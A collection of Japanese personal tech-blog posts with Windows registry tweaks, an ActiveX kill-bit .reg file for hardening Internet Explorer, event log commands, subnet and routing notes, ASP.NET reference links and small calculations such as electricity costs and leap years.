HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoViewContextMenu   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化)    画面のプロパティから「Web」タブを非表示   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : ClassicShell   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化)      アクティブデスクトップを無効化   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer   値の名前   : NoActiveDesktop   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化) USB ポートが無反応になる現象を回避   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USB   値の名前   : DisableSelectiveSuspend   データの種類 : REG_DWORD   データの値 : 0(デフォルト) 1(無効化)          USB のサスペンド機能を無効にすることで競合することを回避。          このレジストリを修正すると USB ルートハブのプロパティを開いた時に、電源の管理タブが表示されなくなります。          Windows XP または Windows Server 2003 を実行するデスクトップ コンピューターに外付けの USB ハブ経由でデバイスを接続しようとすると接続が確立されないことがある          http://support.microsoft.com/kb/902274 ログオン画面のセキュリティを強化する http://pc.nikkeibp.co.jp/article/NPC/20060524/238899/ マイコンピュータのドライブを非表示にする http://pc.nikkeibp.co.jp/article/NPC/20060524/238879/ デスクトップ操作を禁止する http://pc.nikkeibp.co.jp/article/NPC/20060424/236096/
埋め込みe-Words 〜 あなたのWebページに「関連用語」を 〜 http://e-words.jp/p/s-embed.html 張ってみた。 らじろぐ が一部で流行っているらしい。。。 キャロル↓に変更 & TOP ページに貼り付け。  Live Searchを使って他人とつながるブログパーツ、マイクロソフトが公開  http://pc.nikkeibp.co.jp/article/NEWS/20070201/260377/?ST=pc_news  米Yahoo!、バックリンク数を表示するバッジ(ツール)を公開  http://www.sem-r.com/15/20070131000708.html
地域特定技術 【ジオターゲティング】 http://e-words.jp/w/E59CB0E59F9FE789B9E5AE9AE68A80E8A193.html どうやって調べてるんでしょうね、、、 google trends が地域出てますね。アドワーズ広告もなのかな? http://www.google.com/trends 電話番号から特定するものは、以前に作ってみたけど。。。 こっちの下の方にも少し情報を載せてます。
ActiveX コントロールが Internet Explorer で実行されないように Kill Bit を立てる。   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}   値の名前   : Compatibility Flags   データの種類 : REG_DWORD   データの値 : 1024(0x00000400)    ※CLSID は該当する ActiveX コントロールのクラス識別子を記述  参考   Internet Explorer で ActiveX コントロールの動作を停止する方法   http://support.microsoft.com/kb/240797  Windowsに新しいセキュリティ・ホール,任意のプログラムを実行される恐れあり  http://itpro.nikkeibp.co.jp/article/NEWS/20061028/252053/  Visual Studioにセキュリティ・ホール,Webアクセスで被害の恐れ  http://itpro.nikkeibp.co.jp/article/NEWS/20061101/252377/ 適当な名前.reg として保存、実行すれば反映される物を書きました。 --ここから Windows Registry Editor Version 5.00 '*********************************************************************** ' Internet Explorer で ActiveX コントロールの動作を停止する方法 ' http://support.microsoft.com/kb/240797 '*********************************************************************** ' セキュリティ アドバイザリ (927892) XML コアサービスの脆弱性により、リモートでコードが実行される ' http://www.microsoft.com/japan/technet/security/advisory/927892.mspx '  Microsoft XML コアサービスの脆弱性により、リモートでコードが実行される (928088) (MS06-071) '  http://www.microsoft.com/japan/technet/security/bulletin/ms06-071.mspx '  で対応 '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{88d969c5-f192-11d4-a65f-0040963251e5}] '"Compatibility Flags"=dword:00000400 '*********************************************************************** ' セキュリティ アドバイザリ (927709) Visual Studio 2005 の脆弱性により、リモートでコードが実行される ' http://www.microsoft.com/japan/technet/security/advisory/927709.mspx [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}] "Compatibility Flags"=dword:00000400 '*********************************************************************** ' Windowsに新しいセキュリティ・ホール,任意のプログラムを実行される恐れあり ' http://itpro.nikkeibp.co.jp/article/NEWS/20061028/252053/ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000514-0000-0010-8000-00AA006D2EA4}] "Compatibility Flags"=dword:00000400 '*********************************************************************** ' セキュリティ アドバイザリ (925444) Microsoft DirectAnimation パスの ActiveX コントロールの脆弱性により、リモートでコードが実行される ' http://www.microsoft.com/japan/technet/security/advisory/925444.mspx '  Internet Explorer 用の累積的なセキュリティ更新プログラム (922760) (MS06-067) '  http://www.microsoft.com/japan/technet/security/bulletin/ms06-067.mspx '  で対応( Kill Bit が設定されます ) '[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}] '"Compatibility Flags"=dword:00000400 '*********************************************************************** ' Internet Explorer ”Print Table of Links” Cross-Zone Scripting - Advisories ' http://secunia.com/advisories/30141/ ' PhotoStockPlus Uploader Tool ActiveX stack buffer overflows ' http://www.kb.cert.org/vuls/id/406937 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E48BB416-C578-4A62-84C9-5E3389ABE5FC}] "Compatibility Flags"=dword:00000400 '*********************************************************************** --ここまで これもあったね。  SecuniaがIE7の脆弱性を早くも警告、IE6にも存在する“mhtml:”の脆弱性  http://internet.watch.impress.co.jp/cda/news/2006/10/19/13676.html  Secunia がテストを作成しています。  http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/  放置されている残りの脆弱性は下記サイトで   Zero-Day Tracker   http://research.eeye.com/html/alerts/zeroday/index.html   eEye、ゼロデイ脆弱性情報サイトを開設   http://www.itmedia.co.jp/enterprise/articles/0612/07/news031.html
IE7 をインストールした場合、イベントビューアに「Internet Explorer」が追加 されていますが、専用のサービス等を組み込んだ場合にここに登録する方法です。 組み込み方として、「Internet Explorer」を追加する手順を記します。   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog   キーの名前 : Internet Explorer   登録後、最新の情報に更新(F5)を押すと配下に以下の値が追加れさています。   値の名前 : (既定)   値の型 : REG_SZ   値 : 値なし  表示名   値の名前 : Sources   値の型 : REG_MULTI_SZ   値 : Internet Explorer この時点で、イベント ビューアに表示されるようになり、表示名の変更やログサイズの設定が可能。 ここでログサイズの設定すると、レジストリに2つキーが追加されます。  イベントを上書きするまでの経過日数   値の名前 : Retenion   値の型 : REG_DWORD   値 : 604800(秒)デフォルトで 7日  最大ログサイズ   値の名前 : MaxSize   値の型 : REG_DWORD   値 : 524288(Byte)デフォルトで 512KB  ログの保存場所の設定(キーは追加されませんので追加します)   値の名前 : File   値の型 : REG_MULTI_SZ   値 : %SystemRoot%\system32\config\IE.Evt コマンドからイベントを記録してみる(XP/2003) ※ここから先は未確認。 eventcreate.exe /T :SUCCESS(成功), ERROR(エラー), WARNING(警告), INFORMATION(情報) /SO :ソース名 /ID :1 〜 1000 /L :書き込み先のログの指定(レジストリ登録名を指定)    アプリケーションログ:APPLICATION    システムログ:SYSTEM    セキュリティログ:SECURITY /D :説明 例) \>eventcreate.exe /T SUCCESS /SO IEApp /ID 90 /L "Internet Explorer" /D "IE7 を起動しました。" スプリクトからは、イベントログにしか書けないようなので  アプリケーション・イベント・ログの作成  http://www.atmarkit.co.jp/fwin2k/operation/wsh07/wsh07_01.html Set objShell = WScript.CreateObject("WScript.Shell") objShell.Run "eventcreate.exe /T SUCCESS /SO IEApp /ID 90 /L ""Internet Explorer"" /D ""IE7 を起動しました。""" こんな感じかな。 この他に、特定のイベントをトリガーとして任意のコマンドラインを実行する「eventtriggers.exe」もある。 eventtriggers.exe を使ってアカウントがロックアウトされたタイミング(イベントID539)で管理者に通知するには \>eventtriggers.exe /create /tr "lockout" /l security /eid 539 /tk "net send administrator アカウントロックアウトが発生しました。"  強化されたコマンドライン・ツール(前編)  http://www.atmarkit.co.jp/fwin2k/xp_feature/013commandtool/commandtool.html  コマンド ラインからイベント ログを管理する  http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/ServerHelp/3208b2f6-30c4-4bc4-a7ef-829148a34e30.mspx?mfr=true
はてなブックマーク > 人気エントリー > www.netdive.jp http://b.hatena.ne.jp/entrylist?url=http%3A%2F%2Fwww.netdive.jp%2F&sort=count ブックマークされてたようで… 情報に間違いがあれば教えてくださいませ。。。
「ボットネットは“目立たない”ように工夫を凝らす」---IIJの齋藤氏 http://itpro.nikkeibp.co.jp/article/NEWS/20061116/254007/?ST=print |「近接伝播」も最近の特徴であるという。別のコンピュータに感染を広げるボットの場合, |ランダムに感染先を探すのではなく,現在感染しているマシンの近傍のIPアドレスを持つ |マシンを狙う。同一ネットワーク内で感染を広げれば,「(ボットのトラフィックが) |バックボーンをまたがないのでISPは気づきにくい。 9月末辺りから、いっぱい飛んできますねぇ… ウイルス作者の新手口,Googleマップで感染マシンの場所を突き止める http://itpro.nikkeibp.co.jp/article/USNEWS/20061116/253918/ 局地的にスパイされるわけですよね、、、 各国の政府機関が欲しがるネットワークが構築されつつあるのかな…
無償のWebグループウエア「GroupBoard Workspace 2007」が備える新機能 http://itpro.nikkeibp.co.jp/article/COLUMN/20061205/256024/ 窓の杜 - 【NEWS】手軽に導入できるフリーで多機能なWebグループウェア「GSMoN」 http://www.forest.impress.co.jp/article/2007/03/01/gsmon.html 触ってみるかねぇ… とりあえず Apache (apache_2.2.3-win32-x86-no_ssl.msi) http://ftp.kddilabs.jp/infosystems/apache/httpd/binaries/win32/ ActivePerl http://www.activestate.com/store/activeperl ついでに Ruby on Rails http://rubyforge.org/frs/?group_id=904
電気代 気にした事無かったんだけど。。。 V ボルト(電圧)        A アンペア(電流)       VA ボルトアンペア(皮相電力) W ワット(電力)       電力(W)=電圧(V)×電流(A)×力率 Wh ワットアワー(電力量)   電力量(Wh)=電力(W)×使用時間(h) 中部電力(2006.12.10の時点)( http://www.chuden.co.jp/tetsuduki/home/basic/dentou.html ) 120kWhまで       \16.01 120kWhをこえ300kWhまで \20.08 300kWhをこえる     \21.51 プレステ3を1日動かしていたら 0.38kW * 24h * \21.51 = 196.1712 一ヶ月で 約5900円(196.1712 * 30 = 5885.136) TVの場合は 52型の液晶アクオスが約322W、57型で約528W 42型ビエラが345W、50型で455W、58型で590W、103型は1450W(これはコンセントやばそうだ) 24 時間動かしているサーバを仮想化しないと!  そういえば PLC が始まったけど、家電製品のノイズ対策ってどうなん?  AV 機器はデリケートだから、クリアな音・はっきりした映像を求めるなら  電源周のノイズ(電波や電磁波)を減らす事が重要と言われているけど。。。   そういう対策がしてある電源コード(オーディオ系の電源コードを調べれば見つかります)もあります。   PS3 は次世代音声フォーマットに対応(TrueHD、DD+)出力するAVアンプがまだ無いみたいだけど...   将来的に PLC ノイズ(配電線内を 4〜28 MHzの高周波が流れる事になる)の対策が必要になるのかも。  モバイル向けCore 2 Duo搭載で高性能と省エネを見事に両立!  http://journal.mycom.co.jp/ad/2006/sycom/review/silentmaster_duo2.html  PCの消費電力を最適化するフリーソフト「LocalCooling」  http://www.gizmodo.jp/2007/10/pclocalcooling.html  「PS3の消費電力は冷蔵庫の5倍」調査結果  http://wiredvision.jp/news/200806/2008060422.html
無線LAN共有サービスの「FON」が日本上陸--ルータの無償配布も http://japan.cnet.com/news/com/story/0,2000056021,20337376,00.htm  最近のメーカ製 PC ってメディアサーバみたいなの実装してますよね。  guest アカウントを有効にしちゃったりしてる訳ですが、、、    こういったサービスを利用する場合は、administrator アカウントの名前を変更する  さらには guest、administrator アカウントは無効にしておきたいですが、、、  (NTLMv2 認証のみの設定にしてあれば、ある程度は防げるとは思いますが・・・)  何人の人が理解できてるんでしょうかね。     脅威とその対策 第 5 章 : セキュリティ オプション   http://www.microsoft.com/japan/technet/security/topics/serversecurity/tcg/tcgch05n.mspx  今使っているルータの下にぶら下げてるだけの人は、やばい香りがします。。。  スカイプは最近どうなんでしょうね、、、  常駐しているだけで感染する脆弱性があったみたいですけど。。。  他人のネットタダ乗り“無銭”LANが秋葉原でバカ売れ  http://www.zakzak.co.jp/digi-mono/goods/news/20091203/gds0912031648001-n2.htm  LAN間接続している場合って、どうなんだろう・・・  ニンテンドー DS を無線に参加させている環境は危険そうですね。
「秘密基地をつくろう!」のグリッターパネルだけ試す http://journal.mycom.co.jp/articles/2006/12/20/gp/ これ、ログやパフォーマンスモニタと連動出来ないかなぁ。。。

うぉ、惜しい…お年玉貰えず。。。
リバース・プロキシ リバース・プロキシについては http://www.atmarkit.co.jp/icd/root/83/4832083.html この辺りの記事を。 Web カメラを IIS を中継させて接続出来ないか調べてたんだけど。。。 ・Microsoft ISA Srever 2006 を使う方法  http://www.microsoft.com/japan/isaserver/default.mspx ・Apache をインストールして、Apache の機能のリバースProxy を使う方法  http://www.apache.jp/ ・DeleGate を使う方法  http://www.delegate.org/delegate/   って感じかなぁ… HTTP_X_FORWARDED_FOR、HTTP_X_FORWARDED_HOST 辺りをいじって 単独で動かせないかなぁ、、、  Microsoft TechNet バーチャル ラボ: セキュリティ バーチャル ラボ公開  http://www.microsoft.com/japan/technet/traincert/virtuallab/security.mspx  で、Internet Security and Acceleration Server 2006 は触れるみたい。 関連っぽいような。。。  ユニバーサルな中間者攻撃(マン・イン・ザ・ミドル)フィッシング・キットを新たに発見  新キットは、より高度化かつ自動化された、不正行為者によるオンライン不正攻撃を助長  http://www.rsasecurity.co.jp/news/data/20070110.html
ダウンロード出来ないストリーム再生方法。(まぁしようと思えば出来るけど) SSL を使って IE に貼り付けたメディアプレーヤで再生させる。 https から始まるアドレスでも IE に貼り付けてある場合はストリーム再生されます。 単体で起動して URL を入力した場合、https から始まる URL は再生できません。 あとは URLScan の設定で、AllowHighBitCharacters=0 にしておくとかで。 IIS6.0 + URLScan2.5 の環境下で確認。 あー、単純に WMV のマッピング削除して、スプリクトから再生するように書けば OK か...
Response.Redirect  あれ、、、別サーバへリダイレクトさせると、リファラーが無くなってる…  何時から通知されなくなったんだろう...  2007.4.13 確認したら拾えるようになってた。うむぅ。。。
IP Unnumbered と フレッツスクエアを同時に使う ・ルータを2つ用意  ルータ1   IP Unnumbered を設定   フレッツスクエア向けのルーティング情報追加   (10.0.0.0/8 を設定してゲートウェイをルータ2へ向ける)  ルータ2で、フレッツスクエアに接続する設定。  ルーティング情報は フレッツスクエアを利用する端末のみ設定しても構わない。 ルート情報の追加登録は  route /s add 10.0.0.0 mask 255.0.0.0 [ルータ2のゲートウェイアドレス] metric 1 if 1 route print で確認出来ます。 おまけ。 サブネットマスク(2進数) ビットマスク(CIDR) IPアドレス数 255.255.255.255(11111111.11111111.11111111.11111111)32 1(HOST を表す) 255.255.255.254(11111111.11111111.11111111.11111110)31 2(利用できない) 255.255.255.252(11111111.11111111.11111111.11111100)30 4 255.255.255.248(11111111.11111111.11111111.11111000)29 8 255.255.255.240(11111111.11111111.11111111.11110000)28 16 255.255.255.224(11111111.11111111.11111111.11100000)27 32 255.255.255.192(11111111.11111111.11111111.11000000)26 64 255.255.255.128(11111111.11111111.11111111.10000000)25 128 255.255.255.0 (11111111.11111111.11111111.00000000)24 256 255.255.254.0 (11111111.11111111.11111110.00000000)23 512 255.255.252.0 (11111111.11111111.11111100.00000000)22 1024 255.255.248.0 (11111111.11111111.11111000.00000000)21 2048 255.255.240.0 (11111111.11111111.11110000.00000000)20 4096 255.255.224.0 (11111111.11111111.11100000.00000000)19 8192 255.255.192.0 (11111111.11111111.11000000.00000000)18 16384 255.255.128.0 (11111111.11111111.10000000.00000000)17 32768 255.255.0.0 (11111111.11111111.00000000.00000000)16 65536 255.254.0.0 (11111111.11111110.00000000.00000000)15 131072 255.252.0.0 (11111111.11111100.00000000.00000000)14 262144 255.248.0.0 (11111111.11111000.00000000.00000000)13 524288 255.240.0.0 (11111111.11110000.00000000.00000000)12 1048576 255.224.0.0 (11111111.11100000.00000000.00000000)11 2097152 255.192.0.0 (11111111.11000000.00000000.00000000)10 4194304 255.128.0.0 (11111111.10000000.00000000.00000000) 9 8388608 255.0.0.0 (11111111.00000000.00000000.00000000) 8 16777216 254.0.0.0 (11111110.00000000.00000000.00000000) 7 33554432 252.0.0.0 (11111100.00000000.00000000.00000000) 6 67108864 248.0.0.0 (11111000.00000000.00000000.00000000) 5 134217728 240.0.0.0 (11110000.00000000.00000000.00000000) 4 268435456 224.0.0.0 (11100000.00000000.00000000.00000000) 3 536870912 192.0.0.0 (11000000.00000000.00000000.00000000) 2 1073741824 128.0.0.0 (10000000.00000000.00000000.00000000) 1 2147483648 0.0.0.0 (00000000.00000000.00000000.00000000) 0 4294967296 クラスA 0.0.0.0 - 127.255.255.255 クラスB 128.0.0.0 - 191.255.255.255 クラスC 192.0.0.0 - 223.255.255.255 クラスD 224.0.0.0 - 239.255.255.255 クラスE 240.0.0.0 - 255.255.255.255 プライベートIPアドレス(割り当て可能な範囲 RFC1918の規定による) クラスA 10.0.0.0 - 10.255.255.255 /8 クラスB 172.16.0.0 - 172.31.255.255 /12 クラスC 192.168.0.0 - 192.168.255.255 /16 クラスC 192.168.0.0 を使った例 サブネットマスク 255.255.255.192 ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス 192.168.0.0 192.168.0.1 192.168.0.62 192.168.0.63 192.168.0.64 192.168.0.65 192.168.0.126 192.168.0.127 192.168.0.128 192.168.0.129 192.168.0.190 192.168.0.191 192.168.0.192 192.168.0.193 192.168.0.254 192.168.0.255 サブネットマスク 255.255.255.128 ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス 192.168.0.0 192.168.0.1 192.168.0.126 192.168.0.127 192.168.0.128 192.168.0.129 192.168.0.254 192.168.0.255 サブネットマスク 255.255.255.0 ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス 192.168.0.0 192.168.0.1 192.168.0.254 192.168.0.255 ルータが3台あるネットワークのルーティングを知ろう 経路が複数あるときのルータ設定とその動作 http://ascii.jp/elem/000/000/599/599447/
あとで読む。 最新のインターネットAPサーバ「IIS 7.0」の実力を探る http://www.itmedia.co.jp/enterprise/articles/0701/10/news001.html Xbox 360で.NETとC#による自作ゲームを動かそう http://www.atmarkit.co.jp/fdotnet/directxworld/xnaanniversary01/xnaanniversary01_01.html Second Lifeの閲覧がソフトオープンソース化 http://journal.mycom.co.jp/news/2007/01/09/341.html Windows管理者必携、Sysinternalsでシステムを把握 http://www.atmarkit.co.jp/fsecurity/column/ueno/43.html なぜPHPアプリにセキュリティホールが多いのか? 第1回 CVEでみるPHPアプリケーションセキュリティ http://gihyo.jp/serial/2007/php-security/0001 脆弱性を利用した攻撃手法(2) --- Webアプリケーションを突く攻撃 http://itpro.nikkeibp.co.jp/article/COLUMN/20070105/258101/ 続々誕生する新種のネット依存症 http://www.yomiuri.co.jp/atmoney/yw/yw07012801.htm
インフォスフィア:「フレッツ」接続サービスがお得なキャンペーン! http://www.sphere.ne.jp/b-special/index.html な!現行ユーザは無視ですか、そうですか... と、いう事で新規契約しなおしです。 IP アドレスが変更になりますが、まぁ問題ないでしょう・・・ 新しいIPアドレス貰いました。 逆引きの委任アドレスが違ってるけど、まぁ後日修正で。。。
Windows Presentation Foundation (WPF) “WPF/E” vs. Adobe Flash、ガチンコ対決! http://www.atmarkit.co.jp/fdotnet/insiderseye/20061214wpfe01/wpfe010_01.html WPF/EはUIの選択肢になるか http://itpro.nikkeibp.co.jp/article/COLUMN/20061211/256568/ “WPF/E”開発を体験してみよう! http://www.atmarkit.co.jp/fdotnet/insiderseye/20061221wpfe02/wpfe02_01.html WPFを使う上でのQ&A http://itpro.nikkeibp.co.jp/article/COLUMN/20061128/255168/ Windows Vistaソフトウェアコンテスト|WPFローカルアプリケーションについて http://www.vistacon.jp/wpf_local/index.htm   Microsoft Windows Software Development Kit (SDK) for Beta 2 of Windows Vista and WinFX Runtime Components - (8 KB - 2343.8MB) http://www.microsoft.com/downloads/details.aspx?FamilyId=13F8E273-F5EA-4B7B-B022-97755838DB94&displaylang=en Virtual CD-ROM Control Panel for Windows XP (59.6K) http://download.microsoft.com/download/7/b/6/7b6abd84-7841-4978-96f5-bd58df02efa2/winxpvirtualcdcontrolpanel_21.exe Windows Vista デベロッパーセンター http://www.microsoft.com/japan/msdn/windowsvista/ Windows サイドバー ガジェットの API リファレンス http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sidebar/sidebar/reference/refs.asp “WPF/E” (codename) Community Technology Preview for Windows (Feb 2007) http://www.microsoft.com/downloads/details.aspx?FamilyID=e63992d3-ccf5-40b9-b98a-d16bca57467c&DisplayLang=en “WPF/E” (codename) Software Development Kit (SDK) Community Technology Preview (Feb 2007) http://www.microsoft.com/downloads/details.aspx?FamilyID=c744cbb8-d4d9-4bf9-ad5c-eef36e064911&DisplayLang=en “WPF/E” (codename) Community Technology Preview for Mac (Feb 2007) http://www.microsoft.com/downloads/details.aspx?FamilyID=8b6b1524-ecd9-4ff2-bb0f-d9156f570c5b&DisplayLang=en ASP.NET をまだ触った事が無いわけで、この機会にまとめて... とりあえず、Visual Web Developer 2005 Express Editionをノート入れつつ Expression Webを注文。  Microsoft Expression Web製品レビュー(前編)  http://www.atmarkit.co.jp/fdotnet/special/expressionweb01/expressionweb01_04.html  Microsoft Expression Web製品レビュー(後編)  http://www.atmarkit.co.jp/fdotnet/special/expressionweb02/expressionweb02_01.html  IEerBug  http://oss.moongift.jp/intro/i-3522.html  コンピュータにインストールされている .NET Framework のバージョンを調べる方法はありますか  http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0714.mspx .NET Framework 2.0 が IIS で利用できない場合は aspnet_regiis を使う。  ASP.NET のバージョンを表示する  ASP.NET インストールでのトラブルシューティング
ASP.NET ASP から ASP.NET 2.0 への移行 ASP.NET 1.x から ASP.NET 2.0 への移行 ASP.NET における認証 : .NET セキュリティ ガイド ASP.NET で System.DirectoryServices 名前空間を使用する方法 認証を委任する場合の ASP.NET アプリケーションの構成方法 Hiroyasu Kitagawa’s Blog : システム管理者のための.NET Framework http://blogs.msdn.com/hiroyask/archive/2006/11/20/net-framework.aspx .NET Framework 2.0 廃止予定の API 一覧 .NET Framework 3.0 環境構築 ASP.NET AJAX 1.0 連載 ASP.NET AJAXを理解する  第1回 ASP.NETはどのように“Ajax”と融合したのか?  http://www.atmarkit.co.jp/fdotnet/aspnetajax/aspnetajax01/aspnetajax01_01.html  第2回 ASP.NET AJAXを使いこなす  http://www.atmarkit.co.jp/fdotnet/aspnetajax/aspnetajax02/aspnetajax02_01.html 柔軟な.NET構成セクションハンドラ(.config)の作成 コンピュータにインストールされている .NET Framework のバージョンを調べる方法はありますか http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0712.mspx 現実に最も使える.NETのバージョンはどれ? http://www.atmarkit.co.jp/fdotnet/chushin/opinion_dotnetversion/opinion_dotnetversion.html Windowsでイントラ・ブログを構築する(前編)(@IT) http://www.atmarkit.co.jp/fwin2k/operation/intrablog01/intrablog01_01.html Windowsでイントラ・ブログを構築する(後編) http://www.atmarkit.co.jp/fwin2k/operation/intrablog02/intrablog02_01.html Web Matrixで始めるWebアプリ・プログラミング 第1回 オール・フリーなASP.NET統合開発環境 http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix01/webmatrix01_01.html 第2回 Web MatrixによるASP.NET開発の基礎 http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix02/webmatrix02_01.html 第3回 Web MatrixでWebアプリケーションを開発しよう http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix03/webmatrix03_01.html 第4回 Web Matrix独自のサーバ・コントロールの活用 http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix04/webmatrix04_01.html 第5回 Web Matrixの開発支援機能を駆使する http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix05/webmatrix05_01.html ASP.NET + Ajax http://www.friendlysw.com/aspnet/aspnet.asp GotDotNet Japan http://www.gotdotnet.com/japan/ Microsoft ASP.NET クイック スタート チュートリアル http://ja.gotdotnet.com/quickstart/aspplus/ Microsoft .NET Framework SDK クイック スタート チュートリアル http://ja.gotdotnet.com/quickstart/default.aspx テスト用途向け無償のASP.NET ホスティング http://europe.webmatrixhosting.net/japan/default.aspx ASP.NETアプリケーションの脆弱性を開発時から洗い出す分析ツール http://www.itmedia.co.jp/enterprise/articles/0604/20/news084.html Visual Studio 2005エディション比較 Professional? Standard? それともExpress? http://www.atmarkit.co.jp/fdotnet/special/vs2005compare/vs2005compare_01.html 認証する: サイトの認証を ASP.NET 2.0 Membership API でアップグレードする http://www.microsoft.com/japan/msdn/msdnmag/issues/05/11/Membership/ 保護していますか: ASP.NET 2.0 と IIS 6.0 によるセキュア Web アプリケーションの設計と配置 http://www.microsoft.com/japan/msdn/msdnmag/issues/05/11/SecureWebApps/ プログラムコードと HTML コードを分離する方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/codebehind/ Cookie の設定と取得をする方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/Cookie/ How To: ASP.NET 2.0 で SQL Server とともにフォーム認証を使用する方法 http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000014.asp How To: ASP.NET 2.0 の複数のドメイン内で Active Directory とともにフォーム認証を使用する方法 http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000021.asp How To: ASP.NET 2.0 で Active Directory とともにフォーム認証を使用する方法 http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000026.asp ファイルのダウンロード機能を実装する方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/download/ セッション変数の設定と取得をする方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/session/ ファイルのアップロード機能を実装する方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/upload/ Enter キーでの Submit を抑止する方法 - ASP.NET プログラミング Tips http://www.microsoft.com/japan/msdn/asp.net/tips/enternosubmit/ .NET アプリケーション用に SQL Server のセキュリティを構成する方法 http://support.microsoft.com/kb/815154/ja セキュリティ保護された ASP.NET アプリケーションの構築 : 認証、認定、および通信のセキュリティ保護 http://www.microsoft.com/japan/msdn/net/security/SecNetch12.aspx .NETでエンタープライズ・アプリケーションはこう変わる http://www.atmarkit.co.jp/fdotnet/entwebapp/entwebapp01/entwebapp01_01.html ショッピング・サイト構築で学ぶASP.NET実践講座 http://www.atmarkit.co.jp/fdotnet/aspexp/aspexp01/aspexp01_01.html ASP.NETがもたらす次世代のWebプログラミング http://www.atmarkit.co.jp/fdotnet/aspnet/aspnet01/aspnet01_01.html 「ASP.NETってナニ?」と闘う! http://www.atmarkit.co.jp/fdotnet/aspdevura/aspdevura01/aspdevura01_01.html Windows Server 2003 上の IIS 6.0 での IIS 5 プロセス分離モード使用時に、ASP.NET 1.1 で ASPNET アカウントのプロセス ID を構成する方法 http://support.microsoft.com/kb/895967/ja そろそろ ASP.NET って事で 2冊買ってみた。 10日でおぼえるASP.NET 2.0 入門教室 (大型本) Microsoft Visual Studio 2005によるWebアプリケーション構築技法 (大型本) クロスサイトスクリプティング対策用のライブラリ  Microsoft Anti-Cross Site Scripting Library V1.5  http://www.microsoft.com/downloads/details.aspx?FamilyId=EFB9C819-53FF-4F82-BFAF-E11625130C25&displaylang=en  Microsoft Anti-Cross Site Scripting Library V3.0 Beta  http://www.microsoft.com/downloads/details.aspx?FamilyID=051ee83c-5ccf-48ed-8463-02f56a6bfc09&DisplayLang=en  使い方はこの辺り http://msdn.microsoft.com/en-us/magazine/cc794277.aspx 脆弱性を確認できるバイナリ解析ツール  Microsoft Code Analysis Tool .NET (CAT.NET) v1 CTP - 64 bit  http://www.microsoft.com/downloads/details.aspx?FamilyID=e0052bba-2d50-4214-b65b-37e5ef44f146&DisplayLang=en Web アプリケーション セキュリティ強化: 脅威とその対策 http://www.microsoft.com/japan/msdn/security/guidance/secmod89.mspx ASP.NET AJAXでYahoo! ウェブ検索Webサービスを利用してみよう http://itpro.nikkeibp.co.jp/article/COLUMN/20061121/254331/ ..NET TIPS - .NET開発のテクニックとヒント集 - http://www.atmarkit.co.jp/fdotnet/dotnettips/index/index.html ..NETのデータセットとデータテーブル http://www.atmarkit.co.jp/fdotnet/vblab/vsdbprog_02/vsdbprog_02_01.html 見つけて得するソースコード専用の検索エンジン http://www.atmarkit.co.jp/fjava/column/andoh/andoh33.html Ajaxでデバッグしよう http://www.atmarkit.co.jp/fwcr/special/ajax_debug/01.html プログラマならWeb APIという巨人の力を使っちゃえ! http://www.atmarkit.co.jp/fnetwork/rensai/5minapi/01.html 連載 .NETでモバイル・サイト開発を始めよう http://www.atmarkit.co.jp/fdotnet/aspnetmobile/aspnetmobile01/aspnetmobile01_01.html Visual Studio 2005によるWindowsデータベース・プログラミング http://www.atmarkit.co.jp/fdotnet/vblab/vsdbprog_index/index.html MS、グーグルなど32社がOpenAjaxに加入 http://www.atmarkit.co.jp/news/200703/23/ajax.html
うるう年の計算(グレゴリオ暦 1583年〜) ・西暦が 4 で割り切れる年はうるう年。 ・4 で割り切れても、100 で割り切れる場合はうるう年ではない。 ・100で割り切れても、400 で割り切れる場合はうるう年。 曜日の計算(ツェラーの公式)  曜日 = ( 年 + 年 / 4 - 年 / 100 + 年 / 400 + ( 13 * 月 + 8 ) / 5 + 日) % 7  この公式は 1月、2月を前年の 13月、14月として取り扱う。  最後に 7 で割った余りが 0 なら 日曜日、1なら 月曜日。  うるう年を判定する方法  http://support.microsoft.com/kb/214019/ja
